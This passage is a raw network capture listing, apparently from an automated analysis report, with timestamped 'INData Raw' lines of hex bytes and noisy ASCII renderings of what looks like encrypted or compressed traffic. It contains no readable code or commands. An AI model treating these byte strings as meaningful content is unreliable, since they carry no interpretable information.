bb 61 a3 d6 76 66 18 71 c7 79 87 0e 1e 2d d0 da 1d 8e
                                              Data Ascii: %B]=:ZM0+u~hRT9WUqY|sJ.;bY8hrrx&\ZbH_7LV-]ng'}ya@#a)`B V8~PD2WR$]a[Iv&a&I60xyB0.Dj$$ss |lJWM\ davfqy-
                                              2021-12-03 07:24:05 UTC180INData Raw: 2f 5d dc 52 cd c3 5b 03 9f e1 c4 18 4f 76 18 e8 98 d1 85 18 aa 00 c3 a5 d2 e9 a9 d1 bd d2 42 a1 22 d8 cb 5c b1 dd 34 54 7b 0c f7 99 a9 31 79 cf c7 e5 e9 2a d5 83 8d 18 79 a4 de 13 12 90 ca 74 1f 73 df 2b 35 30 05 8e d5 ae 0c 22 41 e5 82 e8 7e 07 cc 61 b4 6e 5e 5f 60 58 22 27 ad 48 18 8c 93 68 1b a0 b8 b6 10 c7 fe eb 52 b6 ac c3 47 0f 60 ce 08 19 eb 34 97 19 93 df f6 b5 36 12 d5 55 ec ea 1b b3 3b 9a f0 6c 96 bf 56 8c 55 2e 2b 62 f5 2e 1f 99 bf 58 8b b3 5d a2 0f 94 7a e3 68 8f 46 eb d9 ef db a2 a3 2e 92 12 b4 4c 56 ac ff 06 76 a9 89 8c 72 95 2d ab 9c da 48 33 37 42 ec 85 a5 5b f2 05 0c 24 4c b6 64 55 cf f5 7f e0 b0 43 79 9e 37 e6 44 35 be 46 80 c8 77 aa 8a 35 4d e6 c4 d1 b3 e7 ec a0 90 ff c6 19 f8 c2 2d 4e f1 50 47 76 17 e6 02 e1 1c 47 39 a4 da 95 86 b5 6e
                                              Data Ascii: /]R[OvB"\4T{1y*yts+50"A~an^_`X"'HhRG`46U;lVU.+b.X]zhF.LVvr-H37B[$LdUCy7D5Fw5M-NPGvG9n
                                              2021-12-03 07:24:05 UTC182INData Raw: 53 f4 84 0c 20 86 e7 59 d0 fd 39 dd 78 95 31 c5 48 0e 37 39 f4 7f 27 0c 04 f5 e4 76 ef 9d 5b 5d 92 10 ae dc b7 67 8e d4 e3 25 19 36 bc 1c 07 ff ca de ae c8 60 fe f6 7f c1 fb 5d 38 16 cc da e6 dc da cb a8 26 33 c1 f5 be 64 46 25 eb 79 26 f3 78 12 58 5d 10 be 13 88 02 1c 84 fb 12 19 41 c7 1d cf 93 f6 ac 70 80 40 25 d5 50 c4 de f7 f4 b6 f7 03 30 dd 75 50 46 24 ed eb 11 93 1d 4f dd 50 59 90 6b 74 b0 61 6c b4 af 65 fb ec ad 71 b0 60 3f 89 ee b7 44 3b fd ec 73 d6 ae 55 df ba e1 07 0f 2e 80 43 99 cf bb 1a 82 b8 68 b0 a8 c3 55 c1 49 c4 95 fb a6 9a d6 42 48 e2 38 e1 db 5c f8 1e c6 d0 c1 87 78 91 74 b0 3a 73 51 79 0d bc f8 55 af 3c e5 c9 e3 83 5b fc 8f e0 52 b9 a6 29 d8 02 c9 d8 fe 92 b1 5f 79 26 4a b7 1b 63 50 ef e4 4b 9f 00 5a 62 ce fe 21 d9 19 d6 9d c4 2e 68 0b
                                              Data Ascii: S Y9x1H79'v[]g%6`]8&3dF%y&xX]Ap@%P0uPF$OPYktaleq`?D;sU.ChUIBH8\xt:sQyU<[R)_y&JcPKZb!.h
                                              2021-12-03 07:24:05 UTC183INData Raw: 9b 96 1c 7b 59 c7 20 7d cc 03 df 6b 42 41 a6 bf 3e 10 06 ca 16 9d 95 c1 53 d3 4b 3d 8c 56 83 0e b4 41 0a 16 0e a9 5f 2a f8 8c 6c fb 72 62 ce 22 9f 2f ae 5c f4 75 d7 23 a2 7f 9b 12 51 fe f2 c7 50 b2 93 a1 d2 58 cc e0 34 e9 a2 97 00 13 39 84 cd d0 10 ee 57 e5 c4 19 25 3b d7 65 8a 61 f2 b0 af 6e 2c 01 4c f7 b8 1f 80 3e be 21 cb bb e2 34 96 31 cd 6a 19 46 9c 4c 09 c6 ee 45 4f a9 10 d9 62 54 3a ff 50 f7 4f 59 f4 94 12 16 a9 13 f4 4a a5 37 e3 79 63 ee 17 14 a0 37 26 fd 98 66 c3 cf 31 fe 06 bf 38 9f 55 0c e4 96 1b bc d0 80 23 e2 4c 96 7a ab 0f ff d3 47 c9 ee 36 90 c5 49 ff cd b9 cb 41 cb 52 51 59 15 70 02 f4 8e a1 9c eb 3c b8 bc b7 59 e4 ce 27 93 9d 49 6f 32 21 79 01 3a 82 13 e0 e3 d7 95 30 69 54 e4 50 db 55 62 06 42 2b d1 09 e3 ef 26 19 b2 14 0f bf 35 64 c0 14
                                              Data Ascii: {Y }kBA>SK=VA_*lrb"/\u#QPX49W%;ean,L>!41jFLEObT:POYJ7yc7&f18U#LzG6IARQYp<Y'Io2!y:0iTPUbB+&5d
                                              2021-12-03 07:24:05 UTC184INData Raw: 0f be 8a 07 0d 68 38 be b1 86 7b da 7d 4a c2 5f ae 16 94 4d 00 15 bd 2d 03 0a 31 6c cc bc f2 46 89 7b 9f 18 8a 9e da 74 5f df 87 11 1e 02 87 13 1d 9d 7f a7 29 31 cd 62 cf ae e6 80 60 b4 33 22 bd 38 fb db b4 e5 39 32 4b 75 9d d1 c2 f2 b6 f7 be 32 4d ee 6a 5b 06 6b 22 21 87 f4 cd 49 36 d4 ee f9 4b b2 f6 3f b6 7a 51 7b 67 1b 9c 5c d4 db 6f dd 2c e1 06 90 c8 46 3a 7f 59 94 18 15 82 6a 26 a8 58 c1 27 26 98 73 4c 89 98 6e 78 4a 74 38 cb 46 ba 14 67 20 04 ee 85 a1 ab 76 26 3a bb c5 9f 85 e5 1e a0 80 3e 1f f3 e1 15 5b 99 0d 06 4f c1 40 33 f6 00 d2 e3 fc 04 b1 ad ed c0 49 e2 fd 5b 7e ed d8 70 9d 96 5a d9 4c 18 6a a1 ff 8f b3 c6 73 53 09 be 71 4c 8a e3 91 c4 17 ee 6b d0 70 86 12 2e bf 89 5f 40 c0 ef 18 88 f6 c0 bc bf fa b2 c7 dc 36 15 85 54 1d be d8 d8 97 3d d9 2e
                                              Data Ascii: h8{}J_M-1lF{t_)1b`3"892Ku2Mj[k"!I6K?zQ{g\o,F:Yj&X'&sLnxJt8Fg v&:>[O@3I[~pZLjsSqLkp._@6T=.
                                              2021-12-03 07:24:05 UTC186INData Raw: 6d 72 06 5d c4 25 46 48 e2 d4 77 6a 66 a0 e9 9b fb f7 18 e9 b9 b6 6e b3 a3 0d 1d ce 76 34 67 31 71 1b 78 df 79 ed d2 10 a8 55 73 c4 0a 82 dd 98 1b 6c 42 d1 b2 8e 28 2e 97 4c 31 2b f9 9b 54 58 60 e8 b9 a0 72 94 a7 cd 57 be a0 e9 32 ef a1 cd 47 2c ef 12 4f 62 55 aa 19 04 9d a9 dc d7 96 97 50 ab 85 f4 5b 01 d1 40 07 85 44 34 16 07 71 24 6b 98 4d 53 29 f7 94 e0 74 1b 9d 9c 4a e6 00 1b e5 74 66 ca 9c aa 7f 59 a9 e4 b9 d1 d1 c9 bb a6 76 fd 2d 19 c2 9b c9 4c 8c 50 c7 59 e0 d2 e4 e3 f7 47 b1 c9 3e 97 fb b5 cf e4 95 b0 75 51 2e 89 61 03 7b 51 7d 80 85 e0 4c 47 73 0d 10 b2 95 72 d9 27 25 04 d4 2b 4f 9e 05 7d 40 ff 25 36 0d 2b 72 66 56 14 04 d4 db de 26 bf b6 56 f8 85 a5 e9 01 b9 62 93 4d 25 ad 8b 19 15 fc c7 15 14 61 32 58 95 79 49 d5 96 b5 f3 54 70 63 0f 01 87 c5
                                              Data Ascii: mr]%FHwjfnv4g1qxyUslB(.L1+TX`rW2G,ObUP[@D4q$kMS)tJtfYv-LPYG>uQ.a{Q}LGsr'%+O}@%6+rfV&VbM%a2XyITpc
                                              2021-12-03 07:24:05 UTC187INData Raw: d0 88 3e 39 01 fb 96 03 9b e0 91 cd a3 cf 24 78 77 42 72 d5 71 c8 c6 f4 48 b6 4b 21 cc df b4 50 ec 0b e3 cb e6 90 e5 5a ed 69 42 91 da 5f 2c 62 ef b1 b8 54 89 ef d0 4a 03 4b 35 8a 49 b6 23 0c c0 ec c7 d6 5e 48 cb b9 28 07 c3 22 58 44 46 cc 53 16 5c 83 a3 b0 33 da d0 c1 65 e4 b5 dd f9 99 2f 79 fe c6 be e1 64 5d bf 0a 08 d1 95 86 04 98 5b b3 13 72 75 5e b3 9b 4f 56 79 1f 23 f0 38 83 e1 ce 59 e3 94 bc 01 38 e2 01 0b e3 b7 82 a2 5f 8e 27 66 84 f7 62 4c ee cd 53 d0 03 33 63 f0 e1 ee dc 8e d5 dc e1 60 53 68 29 e2 45 d0 06 12 b8 fc 9d 66 d1 f1 87 14 94 db 96 c0 a7 20 b6 51 17 34 c3 2c b4 90 27 7e 8d 5f e3 03 2a dc 7f 02 f2 1c 3e 40 b9 21 58 c4 bf d5 92 23 cf 28 f6 f1 a5 4d 4d 54 03 79 3d f5 f3 43 84 06 be d7 06 69 b1 5a 8d 9d ff d9 a5 4f 6a 38 82 3c a3 bf dd 71
                                              Data Ascii: >9$xwBrqHK!PZiB_,bTJK5I#^H("XDFS\3e/yd][ru^OVy#8Y8_'fbLS3c`Sh)Ef Q4,'~_*>@!X#(MMTy=CiZOj8<q
                                              2021-12-03 07:24:05 UTC188INData Raw: 5d 12 8d 32 a3 65 50 46 17 b3 6f 2b f5 2c 0e fe 17 1c 97 1d 76 22 5f b8 c7 52 c4 38 24 69 d0 4b a2 4e 46 c4 16 61 65 ee bb d9 c4 41 d7 f6 2f e0 34 52 09 9d 66 53 66 0c d1 4e c2 34 ee 65 a0 e8 6b 10 94 64 6d fc 69 65 d0 d8 d0 ed 11 be f9 80 b9 4e 4f 96 8a 9f 0f 81 29 e2 71 b9 9a a2 55 b9 55 47 0d e7 11 90 68 50 d2 c6 2d c9 de 86 f8 54 b0 17 7a 17 33 83 ae 9c 0a 29 4f f2 bc 5d 41 fd 51 9a e2 53 1a 25 ea 7d 05 7d 8f 1b 62 e4 e8 95 b5 45 6b e3 7c d9 1b 00 b8 46 82 d1 8f cf 54 37 73 b0 6a 3c 12 78 ea c0 84 3d ec 37 75 5b 2c 15 40 fb 14 a4 7e 97 ff b8 9b af 82 e3 c0 c4 53 fa fb 30 a8 f3 03 05 a2 89 d7 a2 b7 48 90 73 cc 67 9e 96 8b 94 70 47 fb dd 80 86 89 e4 78 63 31 4f 9e a5 e9 e6 47 94 e2 42 bf 4c 52 12 a7 54 ea 2c 20 51 46 d0 3a 2c bb d9 8e aa 8c 7c 29 d1 46
                                              Data Ascii: ]2ePFo+,v"_R8$iKNFaeA/4RfSfN4ekdmieNO)qUUGhP-Tz3)O]AQS%}}bEk|FT7sj<x=7u[,@~S0HsgpGxc1OGBLRT, QF:,|)F
                                              2021-12-03 07:24:05 UTC189INData Raw: dc 7d 45 20 45 d3 23 4e 56 80 7c e3 18 a4 59 39 00 48 fe 78 13 1f f7 1a 52 cd b6 dd 82 f2 f7 8f cf 46 0c 6a 16 c4 b3 15 52 43 92 bf 52 c7 6d 23 c2 64 50 db d1 7a f0 5d 4b 38 9d 7f 9f 01 4b 21 ea af 4f b6 ea 70 d9 33 bc d0 30 81 0f 3a a0 c5 ad 1e 60 f4 58 59 6d 18 77 4d fd 58 ba a1 dc d7 06 e9 3b b1 14 fb 89 53 36 fd 86 00 00 c0 61 9c 8b 76 a7 5d 6f 69 46 de 31 f5 a5 75 6f 2c 3b 71 b1 88 39 b6 ab 0d 83 39 bd 68 09 14 a9 be fe 63 29 c4 d3 1a 8d 81 f0 b8 b6 ff d9 d4 9f 35 f2 82 cd 3f cf 91 ab 91 ca f7 60 5b 01 53 66 65 24 57 75 d6 cb 4d 66 56 44 cf 42 e9 30 12 6e bd 79 9f a1 48 d3 f1 8e e6 9f eb f2 18 99 f3 13 01 50 fc ac 2e 5e 49 11 d5 29 01 ff 19 e1 d2 cf f1 26 6a 96 fa 2e 0c 88 54 ba 70 69 81 7f f0 03 27 1e 15 7f 11 dd 72 9f ae 53 a0 cf 4b 38 2d e8 1d fd
                                              Data Ascii: }E E#NV|Y9HxRFjRCRm#dPz]K8K!Op30:`XYmwMX;S6av]oiF1uo,;q99hc)5?`[Sfe$WuMfVDB0nyHP.^I)&j.Tpi'rSK8-
                                              2021-12-03 07:24:05 UTC191INData Raw: 7d ad 83 36 08 aa 92 8e ca 82 9e af 6a f1 da 29 8c 65 6b 84 42 46 d1 02 a0 23 97 88 b8 72 7e f5 7a f5 59 62 46 9b 20 f6 7a 3c 5d 41 bc ed 21 aa 75 00 73 c2 b7 d5 6e cb e5 87 95 d7 b9 1e 5f de c0 64 7d 57 42 4a 8c e1 2b e3 1a 5d be 92 2d 95 aa a5 4a e4 a7 b2 37 7f d3 85 69 5d ea 44 b3 84 57 e1 df 64 86 0f 21 b3 da 08 c8 27 0c 05 b6 2c 6f b7 5a 78 c0 e6 13 6a b6 2c 71 75 05 3c 63 d2 32 d4 d9 b8 44 08 8e b7 7f ee db b8 6d bc 85 26 d9 8f 44 65 37 ef 41 15 cb 17 c1 99 d3 4a a7 9e ce ab 5f 74 01 1f 4a af db d2 92 fc f7 bd ff 9b 74 5b 39 0b 36 8c aa a8 60 f2 fa 5f 7a cb 5b ca 2e 18 bd 90 b3 49 62 89 50 7d 06 75 f4 5e 35 ce db 51 a8 9d ac 4b f4 92 63 26 7d 28 2b 6e 5c 60 b4 bd 96 56 06 ea ce dc bc 6b 82 b0 34 e8 00 66 3e 3c 1f 81 75 10 8c e5 06 ff 40 92 50 9c 87
                                              Data Ascii: }6j)ekBF#r~zYbF z<]A!usn_d}WBJ+]-J7i]DWd!',oZxj,qu<c2Dm&De7AJ_tJt[96`_z[.IbP}u^5QKc&}(+n\`Vk4f><u@P
                                              2021-12-03 07:24:05 UTC192INData Raw: db c3 06 c1 0a e5 e8 ee 42 b6 40 78 e9 f5 9a cd 63 5c bd 0d e1 fe fc 87 8a ab 33 b0 7a 73 d4 79 9a 98 5d 57 c1 3c 02 f3 a2 83 40 fc 35 e0 04 bc 33 2b 7e 02 b1 e3 e7 92 9d 5f 8c 26 58 9f e0 61 44 ef ab 70 69 00 da 62 73 fe 2d dc 7c d4 fb c4 5f 53 8a 28 0a 50 cc 05 10 b9 94 92 7d d2 f9 86 61 b8 b9 94 e9 a6 e9 92 5d 16 04 c2 77 bf bf 24 66 8c e6 f3 c2 29 be 7e 98 da 8a 3d 7a b8 9b 70 2b bd 8c 93 66 dc 93 f7 ab a4 af 7d cf 02 23 3c 1a df a0 85 7f bf 78 2f b4 b2 20 8c 68 f6 5c a5 d6 6a 2d ac b9 a3 26 dd 5d ed c8 f6 0f d0 0b b0 ce 09 df 1b 42 6a bf be 56 d7 79 be 34 1b c0 df e4 07 3b 6c 74 e3 05 d9 6e ed cf b2 8a 9e 0a 69 88 c5 23 94 97 e9 ac 49 a6 2d f7 07 36 50 44 e7 13 dd 30 cc 93 20 2a ee cc 06 79 5d 40 7e cf c1 48 03 14 e1 05 1e 82 74 20 e8 40 ff 5c 13 ef
                                              Data Ascii: B@xc\3zsy]W<@53+~_&XaDpibs-|_S(P}a]w$f)~=zp+f}#<x/ h\j-&]BjVy4;ltni#I-6PD0 *y]@~Ht @\
                                              2021-12-03 07:24:05 UTC193INData Raw: 02 9c 0a ef aa 94 58 a5 de a7 d1 47 1d e2 62 9e ff 50 46 d0 06 c5 4c 8c a5 63 89 08 e6 02 57 82 7d 80 96 3c d3 f3 8f 47 e4 ce 5d 80 62 4c 89 30 53 70 59 63 80 13 4e cb 56 b6 0f 6d c5 c9 e1 c6 27 25 62 66 36 f2 9f e3 5e 21 3d be 69 0f e7 59 88 e8 14 27 63 32 68 72 bf 00 dd d7 49 b8 e9 97 b4 99 28 82 27 d0 7f c8 7f e0 c7 15 21 fa f0 0f 92 9f f0 a1 54 42 ac 56 b8 60 cd 99 87 87 14 6e 10 d7 be a3 9e e4 42 67 0f 6a 88 a5 a5 e2 f7 a6 58 46 e9 48 c8 17 1c 50 b2 28 62 5b 85 da 60 28 76 cd 49 a0 d0 78 79 f4 89 88 63 33 97 07 31 cb 09 bb 6f 38 76 f9 82 b3 50 07 93 74 e5 98 68 fb ca 86 c9 bc 63 5f 42 13 81 6e 38 bd ff 37 fc a0 99 e1 83 b1 d7 b7 ef db 26 fe 39 93 d7 92 3a 34 49 6a 50 d9 39 c3 20 11 ef 07 74 cc 9f 0c 22 86 55 58 0a ea de df 20 94 0c fc 48 0e 11 38 7f
                                              Data Ascii: XGbPFLcW}<G]bL0SpYcNVm'%bf6^!=iY'c2hrI('!TBV`nBgjXFHP(b[`(vIxyc31o8vPthc_Bn87&9:4IjP9 t"UX H8
                                              2021-12-03 07:24:05 UTC194INData Raw: 77 6a 89 a1 10 9b 13 c7 0e ea ab b6 b2 ee 50 0c 6c ce e1 34 1b 35 e6 19 07 df 7e b1 a3 10 a9 55 1c c5 6a b3 39 9a 9c 6d 16 8f b1 8e d3 2f 74 4c f5 2e e3 98 5e 58 22 b6 46 a1 05 94 33 cd 94 8e 3f eb 4e ef 3b 92 3c 2c ed 12 fa 60 2f ac fe 06 c4 ab 20 89 96 97 75 a9 6e f4 4b 33 11 40 07 85 ee 6a 33 05 0e 24 fc 98 4e 57 b0 f5 eb e0 94 47 1e 9c 4b e6 bc 19 3d 46 9a c8 b9 a8 df 03 b0 e4 37 d3 0c cd df a0 ae fc e5 1d fe c4 8b 4f 3b 54 60 59 57 e5 bb e5 bb 47 da 95 87 93 cf b5 2d e7 f2 b2 aa 53 2b 8a 9f 5c 34 51 3d 84 bc e0 ba 41 f1 16 1f b2 76 34 5d 3e 4a 1d 3e 32 81 9f ba 66 57 ff c1 69 77 2b 0d 66 93 15 c8 d2 cb dd 0d b9 7b 0f b0 82 ff ee f6 be dd 95 1b 20 01 8c e4 42 cf cd 50 1f e4 22 26 82 e6 59 e6 85 d2 b8 fe 64 d5 1b 53 93 55 c7 91 c6 2b a8 ab 8f 8b 5a 1a
                                              Data Ascii: wjPl45~Uj9m/tL.^X"F3?N;<,`/ unK3@j3$NWGK=F7O;T`YWG-S+\4Q=Av4]>J>2fWiw+f{ BP"&YdSU+Z
                                              2021-12-03 07:24:05 UTC195INData Raw: 28 8e 57 fe 9c 70 c1 24 c5 b4 50 a9 0b c7 89 dd 80 4b 5c b8 19 63 e2 24 bd a2 94 e3 0f 3c 81 0c 2f be 3c 1d 48 52 c4 b0 3c 14 e3 9e ca 79 b2 32 5a e8 1c e2 30 74 6f dd 3c d6 8f 00 88 f3 8f 73 aa 1c 44 15 1a ac a2 53 7b f6 59 82 a8 97 ac 88 4a 91 40 cb db d1 0b 01 1c 83 54 94 28 0c 77 73 52 b2 8e 87 e5 c2 15 c4 53 1c a9 18 f5 e1 7e 65 d2 65 7f c0 e1 d7 34 a9 50 8e 39 8a 74 2b f7 67 b3 87 b5 fc c5 69 db 26 1f f0 b4 0f 59 d9 ec 70 d0 44 6f 62 0a 9b 09 b8 aa 9d 8e b0 42 65 09 7c 1e 05 c0 6b e7 88 21 92 6a b7 11 e2 5b d6 cb a4 7f a6 96 fd 51 78 d1 f3 8a bf b2 69 86 cf 66 bb c6 1b 28 48 8b bd f2 49 86 ed 0c 36 6d bc 70 de 22 b8 a3 9b 0d 9a 4c 3f 8d 00 a3 7d 09 9b fc 85 da fe 53 69 b0 b2 84 cd eb be 58 a5 b7 2a 06 ce bd a3 45 9d 4e 89 94 f6 68 b4 6c fd bc 6d 8a
                                              Data Ascii: (Wp$PK\c$</<HR<y2Z0to<sDS{YJ@T(wsRS~ee4P9t+gi&YpDobBe|k!j[Qxif(HI6mp"L?}SiX*ENhlm
                                              2021-12-03 07:24:05 UTC196INData Raw: db 28 66 54 4c 96 7b 1f fb 7c 58 40 e3 bb c4 27 94 54 98 6a e9 13 eb 28 ba c4 d1 13 2c ac 44 d9 26 02 ac ba 50 e0 ef 0d 89 d3 c1 50 e3 45 f4 2d 56 43 1d 33 d3 ec 19 71 73 2e 6d ab 98 07 03 cf 97 bf e0 de 13 9f f8 1c e6 f3 4d bc 20 d6 c8 86 fc 94 45 fc e4 fa 86 47 8d b9 a0 d5 a8 50 5f 98 c4 8c 1b 8c 18 06 59 74 b1 02 83 dd 47 fd c1 3c f3 ac b5 3c b3 ce d7 c4 53 34 de 30 1f 11 23 2a 80 5e 8f 95 24 d3 66 01 d7 a3 55 8c 27 67 5c 42 68 89 9f a7 27 3d ba e8 69 49 73 72 21 98 14 6f 8b 3d bd 03 bf 62 51 fa e6 fd e9 f3 e1 b2 f7 f3 27 b6 d3 ce 2d a6 c7 57 4d f7 71 58 92 db 12 a8 d3 15 ac 10 29 63 48 ce 87 cf 8a 4d b3 80 bc c1 c3 e4 22 3e 0d 0e d4 a5 c5 bb f5 c0 07 46 89 11 ca 55 41 50 f8 72 60 1f d0 da 2e 72 74 8b 07 a0 9a 22 78 bc c6 88 0f 69 95 65 7d cb 65 e1 6e
                                              Data Ascii: (fTL{|X@'Tj(,D&PPE-VC3qs.mM EGP_YtG<<S40#*^$fU'g\Bh'=iIsr!o=bQ'-WMqX)cHM">FUAPr`.rt"xie}en
                                              2021-12-03 07:24:05 UTC198INData Raw: a1 96 2f d7 60 7c e0 08 df 1c 68 56 81 6a b3 db 37 b0 d6 af 68 fd 4b 44 20 1a b9 99 4f 7b eb 09 df cc a6 c3 a6 41 91 2c bb b2 fd 2b 16 2e 8b 59 8f 18 32 7f 79 4f b6 d9 87 e8 d8 22 d5 42 07 92 17 ee fb 71 33 b7 3c 49 92 94 ef 2f ba 6b 85 28 bc 27 4e d1 5d a7 90 99 c1 d4 2f 8e 54 2a eb 98 27 42 83 bc 15 ef 54 28 07 3d fe 1b b9 8b 8b 95 b7 16 00 6c 58 10 22 e8 71 f6 ff 78 fe 5c b7 02 d2 60 dd da 95 2f c3 c2 d4 6a 79 c8 8b d1 de 9d 41 c7 df 50 9d e3 64 78 0d f8 bb f0 58 d9 f5 39 19 39 f1 29 e0 3e bd b1 92 68 e5 28 19 9e 61 8e 5b 6c df fe f7 fa db 36 41 85 db a2 e0 a8 97 7a cd b3 6b 43 c2 98 ea 48 aa 21 86 b0 f6 6d b4 7f d9 bd 40 91 6c 06 01 9f be 51 b3 26 fb 1f 6d e9 ac 98 69 4b 09 7a 96 40 b8 01 84 ce d1 cd fb 4f 20 4d aa 7d f9 b7 9b 6d 2a e1 48 b2 4e b2 38
                                              Data Ascii: /`|hVj7hKD O{A,+.Y2yO"Bq3<I/k('N]/T*'BT(=lX"qx\`/jyAPdxX99)>h(a[l6AzkCH!m@lQ&miKz@O M}m*HN8
                                              2021-12-03 07:24:05 UTC199INData Raw: 17 ce 67 a0 33 43 52 42 29 ea 8f 01 71 73 25 5d 8d fd 66 26 aa 81 b6 a3 d2 2b eb f9 24 92 c2 62 cc 23 80 8e 88 c6 f1 54 c3 85 cb b4 47 8a 81 cd e0 9e 22 7c cf 94 bf 3e d8 3f 02 2d 67 93 61 95 ff 35 fb 96 5b f2 8f ea 10 8a b8 d0 e1 3a 32 e7 44 1f 0c 3d 09 f5 61 85 e3 26 f0 7b 32 f1 93 5f a9 42 4b 70 01 5e bd eb 96 0d 58 ff f3 08 7f 5f 07 14 a5 14 66 a3 4d b0 32 dc 61 7d 93 ea cb ab f6 ca d7 92 e5 46 bd ee 81 28 94 a2 76 60 b4 5d 6d fe fa 28 dc ff 23 c2 14 11 10 6a 97 cf f3 a7 3d 85 bc de f1 ff 97 31 08 63 19 e8 a5 e7 87 81 f4 3b 35 9e 27 a4 64 7e 50 f8 44 0f 28 ef da 2f 41 07 bd 32 d3 b8 78 2c 86 e5 d8 0f 41 e6 62 27 99 63 cd 0b 4a 12 9c 8d f0 20 62 8f 00 91 98 27 8e d8 f2 b3 df 03 2c 49 57 f7 02 5f da 80 42 8c a0 df 84 e8 fb a7 ce 8f b4 67 8d 4a c0 a2 f3
                                              Data Ascii: g3CRB)qs%]f&+$b#TG"|>?-ga5[:2D=a&{2_BKp^X_fM2a}F(v`]m(#j=1c;5'd~PD(/A2x,Ab'cJ b',IW_BgJ
                                              2021-12-03 07:24:05 UTC200INData Raw: 09 78 2e 85 38 86 28 28 49 50 50 b7 db 87 c7 cc 76 d7 5d 73 94 00 f4 ec 7b 3a fc 68 77 81 84 e2 3f 95 77 87 4d cf 25 5f fa 52 b3 87 98 fb df 38 ef 68 2e e8 b1 00 59 8a 9a 19 f3 64 33 0c 3f fe 3d 88 b9 ec a5 aa 10 3c 6d 41 1f 37 89 42 f6 cd 52 fc 5b bd 14 ef 7c df bf c6 30 d5 b6 f7 75 38 e1 b0 dd c8 93 4a a0 a2 7c 9e e6 4e 74 10 ec da d1 4f b6 d5 1a 11 26 d9 7a a7 1e a8 a4 9e 06 c3 4c 29 a3 42 81 4f 6c e9 89 d6 eb cd 3a 41 96 b2 86 ff 88 97 69 c0 92 0a 72 cd af d7 54 b5 20 8a d5 a3 41 b4 6b d3 b2 79 9a 5e 08 1e 9b ed 62 a4 3b d0 16 1b c4 b1 80 69 4a 03 75 86 45 ad 01 84 c1 d4 a1 d9 2a 1d 58 b6 61 e2 b3 9d 69 18 ff 42 d4 6e 9a 34 3c 93 24 b4 9e aa 80 63 58 83 5c 66 20 38 56 0a bd aa 35 64 09 b5 6a 4f dd 06 0c 86 04 fd c0 7d de 53 21 d7 d1 a6 28 d3 93 a7 3d
                                              Data Ascii: x.8((IPPv]s{:hw?wM%_R8h.Yd3?=<mA7BR[|0u8J|NtO&zL)BOl:AirT Aky^b;iJuE*XaiBn4<$cX\f 8V5djO}S!(=
                                              2021-12-03 07:24:05 UTC202INData Raw: a3 2e bd 97 f0 e2 90 24 76 ac ab a7 4c ff 35 25 06 50 88 63 83 e6 22 cd e5 50 97 b9 d8 59 a7 a3 b1 d7 3e 53 cc 5d 5c 3f 3c 7d c7 7e e0 ab 2c 95 49 04 de 83 7e af 55 40 65 2f 2b b6 fa 97 20 7f 9e c3 0c 5c 5f 00 03 a1 79 27 94 58 a8 09 da 73 79 95 eb d6 8c c4 cd c0 f7 ca 4a d0 cf ab 2c 92 a6 61 71 a4 46 73 f7 fe 26 a8 f1 29 d8 09 35 0d 6b d8 e1 d4 a7 3f b7 b8 d1 a3 d9 96 38 17 79 05 de d1 d2 87 94 cb 5e 01 8b 3c 98 72 6a 25 de 5b 14 08 fe a8 0e 49 19 cd 10 c5 b0 17 0a 8d cf fc 1c 56 f4 6a 27 ac 63 cf 31 74 31 98 ff d2 3f 07 89 11 80 c7 3d ab d5 f4 bb d1 62 38 58 67 cd 3e 5b cf 80 5b e9 c2 f5 e1 ff dd c2 d3 80 db 61 9a 5a cc 9f e6 7e 58 5e 19 37 ad 44 8b 4d 74 83 07 01 ac f3 60 54 c1 14 2d 58 9e ba b2 05 f2 72 88 15 48 5e 55 07 2c b6 7c 96 92 f4 76 e8 d4 3c
                                              Data Ascii: .$vL5%Pc"PY>S]\?<}~,I~U@e/+ \_y'XsyJ,aqFs&)5k?8y^<rj%[IVj'c1t1?=b8Xg>[[aZ~X^7DMt`T-XrH^U,|v<
                                              2021-12-03 07:24:05 UTC203INData Raw: 9b 9f f7 c1 2b 86 49 25 9f bc 13 4a 9a b5 15 f3 74 14 17 34 92 2d a4 9c b1 90 b0 1a 3c 67 28 38 3e ff 64 ff d0 73 dd 48 b7 02 e7 66 d1 d0 fb 0c de a1 f7 68 62 cc ad d2 bf a9 4b a4 e7 50 87 c2 51 7e 1b fb ae fe 52 b7 b8 19 02 32 c9 21 f6 23 a8 93 8f 0b c1 3c 09 a5 6f 8e 3c 6e ba c9 da db da 20 4c 83 db b3 f8 82 99 77 a5 a5 0e 72 f3 b8 c6 55 bf 3c 84 a5 82 46 be 76 b0 b4 6c 8b 45 3a 1e 9b ca 63 a5 16 db 02 78 f2 b7 87 73 4f 03 7a e2 45 a0 00 99 ca de 8f cc 3a 07 7c ad 65 f1 fc aa 63 26 fe 59 c0 66 9f 3f 0a 83 13 a5 95 ae f5 54 5e 81 42 07 17 33 73 17 bd ac 35 03 5a 95 77 75 c7 13 26 87 0e 8d e6 6a c3 73 3a cb b8 9a 3a bd c0 b5 3a f8 7f 9b bf 2e 4b 96 ba 29 d9 61 fd f7 96 7b 1e bb 98 b6 17 43 67 d6 20 7f 7d e0 d0 49 7e 90 ad 11 fd 2c 82 42 a7 79 1d f7 12 ec
                                              Data Ascii: +I%Jt4-<g(8>dsHfhbKPQ~R2!#<o<n LwrU<FvlE:cxsOzE:|ec&Yf?T^B3s5Zwu&js:::.K)a{Cg }I~,By
                                              2021-12-03 07:24:05 UTC204INData Raw: 76 8e 86 33 fc 6c 3d d3 94 4c b6 42 51 61 30 2b 94 f1 80 10 59 9a c2 39 6e 59 13 0b a5 60 42 a1 3d 99 35 cb 65 7b fa c7 cc 9d d4 d6 dc e4 ce 55 a4 ee bc 4a bc ae 7b 75 85 4b 47 fd ed 26 c9 e2 38 c9 24 70 04 6a e3 d8 c4 bc 20 a2 ac c8 c6 e8 e4 12 02 7f 1c e8 d7 e3 8d 98 d6 2b 32 8b 3a ca 70 7e 24 e4 6c 0e 28 d8 bf 18 47 18 bb 38 d2 dd 0b 1d 80 c3 cc 00 40 c7 62 54 a4 6a cd 0b 4a 61 aa e8 c7 11 6b 87 04 96 f7 0b 89 d0 d0 b3 d9 15 3a 4f 13 c6 01 76 d2 96 53 9b a0 fe 93 9c d7 b0 b7 ae b3 74 ff 6a fa a4 92 5d 59 31 05 20 d9 58 b0 5c 70 9a 62 07 bf e9 66 45 e5 05 1c 63 98 b0 ad 05 d6 7b 99 2b 7c 67 4b 0d 15 aa 6c 96 b2 eb 04 c8 d6 59 0e f7 64 68 ae ef 14 0d b5 ea 60 02 7d d1 6e 07 ac 33 bd d7 a9 f2 b9 f9 0d 25 b0 5f 5f 73 b8 13 a8 62 ad 4f cf 